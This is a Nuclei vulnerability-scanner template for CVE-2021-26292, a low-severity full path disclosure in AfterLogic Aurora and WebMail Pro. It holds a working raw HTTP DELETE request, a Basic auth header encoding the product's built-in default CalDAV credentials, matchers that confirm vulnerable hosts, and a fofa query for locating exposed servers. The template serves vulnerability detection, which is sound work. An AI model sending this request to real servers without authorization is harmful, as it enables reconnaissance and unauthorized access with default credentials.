nuclei-templates/http/cves/2021/CVE-2021-26292.yaml

id: CVE-2021-26292

info:
  name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure
  author: johnk3r
  severity: low
  description: |
    AfterLogic Aurora and WebMail Pro 7.7.9 and all lower versions are affected by this vulnerability: sending an HTTP DELETE request to the WebDAV endpoint with the built-in “caldav_public_user@localhost” account and its predefined password “caldav_public_user” allows an attacker to obtain the web root path.
  reference:
    - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26292
  classification:
    cve-id: CVE-2021-26292
  metadata:
    verified: true
    max-request: 1
    vendor: AfterLogic
    product: AfterLogic Aurora & WebMail
    fofa-query: "X-Server: AfterlogicDAVServer"
  tags: cve,cve2021,afterlogic,path,disclosure,AfterLogic

http:
  - raw:
      - |
        DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI

    # All three matchers must hit: the error body echoes the account name and
    # the requested file name, the response is XML, and the status is 404.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "caldav_public_user"
          - "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 404
# digest: 490a00463044022055028104fa52e53dda65cd6c1fd9a36737ccf96678fcf059579ef620ef78fd70022024bc13dfdffbb91e551a6ed0049638444de819870faef2b8ad3f8cf5cee035e7:922c64590222798bb761d5b6d8e72950